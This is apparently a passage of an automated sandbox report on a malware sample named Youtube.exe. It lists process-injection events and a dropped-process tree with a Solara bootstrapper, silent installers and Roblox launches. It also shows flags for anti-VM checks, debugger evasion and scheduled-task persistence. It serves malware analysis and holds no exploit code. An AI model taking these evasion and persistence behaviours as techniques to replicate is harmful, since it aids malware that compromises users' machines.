PID 3876 wrote to memory of 3848	3876	Refcrt.exe	147
PID 3876 wrote to memory of 3848	3876	Refcrt.exe	147
PID 3876 wrote to memory of 784	3876	Refcrt.exe	148
PID 3876 wrote to memory of 784	3876	Refcrt.exe	148
PID 3876 wrote to memory of 1204	3876	Refcrt.exe	149
PID 3876 wrote to memory of 1204	3876	Refcrt.exe	149
PID 3876 wrote to memory of 2904	3876	Refcrt.exe	150
PID 3876 wrote to memory of 2904	3876	Refcrt.exe	150
PID 3876 wrote to memory of 4952	3876	Refcrt.exe	151
PID 3876 wrote to memory of 4952	3876	Refcrt.exe	151
PID 3876 wrote to memory of 4008	3876	Refcrt.exe	152
PID 3876 wrote to memory of 4008	3876	Refcrt.exe	152
PID 3876 wrote to memory of 5008	3876	Refcrt.exe	153
PID 3876 wrote to memory of 5008	3876	Refcrt.exe	153
PID 3876 wrote to memory of 1548	3876	Refcrt.exe	155
PID 3876 wrote to memory of 1548	3876	Refcrt.exe	155
PID 3876 wrote to memory of 4752	3876	Refcrt.exe	156
PID 3876 wrote to memory of 4752	3876	Refcrt.exe	156
PID 3876 wrote to memory of 4912	3876	Refcrt.exe	157
PID 3876 wrote to memory of 4912	3876	Refcrt.exe	157
PID 3876 wrote to memory of 1772	3876	Refcrt.exe	173

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Youtube.exe
"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2556
- C:\Users\Admin\AppData\Local\Temp\Result.exe
  "C:\Users\Admin\AppData\Local\Temp\Result.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4604
- - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1540
  - - C:\Windows\SysWOW64\msiexec.exe
      "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6052
  - - C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
      "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
      4⤵
      Executes dropped EXE
      PID:4280
    - - C:\Windows\Temp\{FA910571-3A28-4E19-83D6-6A791BAB7423}\.cr\vc_redist.x64.exe
        
        "C:\Windows\Temp\{FA910571-3A28-4E19-83D6-6A791BAB7423}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=684 -burn.filehandle.self=692 /install /quiet /norestart
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5676
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe
      4⤵
      Enumerates system info in registry
      Modifies registry class
      NTFS ADS
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:4568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc0cdc3cb8,0x7ffc0cdc3cc8,0x7ffc0cdc3cd8
        5⤵
        
        PID:804
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:2
        5⤵
        
        PID:1860
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 /prefetch:3
        5⤵
        
        PID:176
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8
        5⤵
        
        PID:5272
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        5⤵
        
        PID:1984
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        5⤵
        
        PID:5836
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5112 /prefetch:8
        5⤵
        
        PID:5780
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
        5⤵
        
        PID:3088
    - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
        5⤵
        
        PID:5496
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
        5⤵
        
        PID:744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3344 /prefetch:8
        5⤵
        NTFS ADS
        
        PID:5360
    - - C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe
        
        "C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe"
        5⤵
        Executes dropped EXE
        Modifies registry class
        NTFS ADS
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3356
      - C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe
        
        "C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe" --app -channel production
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of UnmapMainImage
        
        PID:9952
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5920 /prefetch:2
        5⤵
        
        PID:400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
        5⤵
        
        PID:13776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
        5⤵
        
        PID:16636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
        5⤵
        
        PID:16724
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
        5⤵
        
        PID:16732
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
        5⤵
        
        PID:12164
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
        5⤵
        
        PID:17672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3568 /prefetch:8
        5⤵
        
        PID:12368
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3536 /prefetch:8
        5⤵
        
        PID:17940
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1732 /prefetch:1
        5⤵
        
        PID:18288
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
        5⤵
        
        PID:18500
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
        5⤵
        
        PID:19140
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
        5⤵
        
        PID:19284
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
        5⤵
        
        PID:15528
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6532 /prefetch:8
        5⤵
        
        PID:15636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1812 /prefetch:1
        5⤵
        
        PID:7740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:1
        5⤵
        
        PID:12544
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
        5⤵
        
        PID:14136
    - - C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe
        
        "C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe" roblox-player:1+launchmode:play+gameinfo:TAb7PAGJ8OynXeZirrpq3QO8VYK6tq7iJxhCZ9NQ0oib8178jjdpG9EfO_S1zTD7SSJPJZscidkmil8yg4aX_Ogr3pgmWEzO_8hZL9MypeIUXqt9Yie99u_yg3bi0UgLuYh4kNbrz29nHFC-2-edHR_611QVzds7TuRR7KvZOjn-SFX8fYapkhKmt31KFPupabziDFfkShwiSkOxw8RXCZ39txDuiJ4THJ6SqlrC_QI+launchtime:1721223661328+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1721223524753009%26placeId%3D189707%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D917eb536-95ba-4b18-b2fb-f81e4d8a21cf%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1721223524753009+robloxLocale:en_us+gameLocale:en_us+channel:zflexlayouttest2+LaunchExp:InApp
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:6304
      - C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe
        
        "C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:TAb7PAGJ8OynXeZirrpq3QO8VYK6tq7iJxhCZ9NQ0oib8178jjdpG9EfO_S1zTD7SSJPJZscidkmil8yg4aX_Ogr3pgmWEzO_8hZL9MypeIUXqt9Yie99u_yg3bi0UgLuYh4kNbrz29nHFC-2-edHR_611QVzds7TuRR7KvZOjn-SFX8fYapkhKmt31KFPupabziDFfkShwiSkOxw8RXCZ39txDuiJ4THJ6SqlrC_QI+launchtime:1721223667457+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1721223524753009%26placeId%3D189707%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D917eb536-95ba-4b18-b2fb-f81e4d8a21cf%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1721223524753009+robloxLocale:en_us+gameLocale:en_us+LaunchExp:InApp+channel:production
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of UnmapMainImage
        
        PID:6544
  - - C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Modifies registry class
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:2036
    - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=2036.5220.16564172339245413398
        5⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:676
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1b4,0x7ffc0cdc3cb8,0x7ffc0cdc3cc8,0x7ffc0cdc3cd8
        6⤵
        
        PID:392
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:2
        6⤵
        
        PID:5864
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=1992 /prefetch:3
        6⤵
        
        PID:5964
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2500 /prefetch:8
        6⤵
        
        PID:5532
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 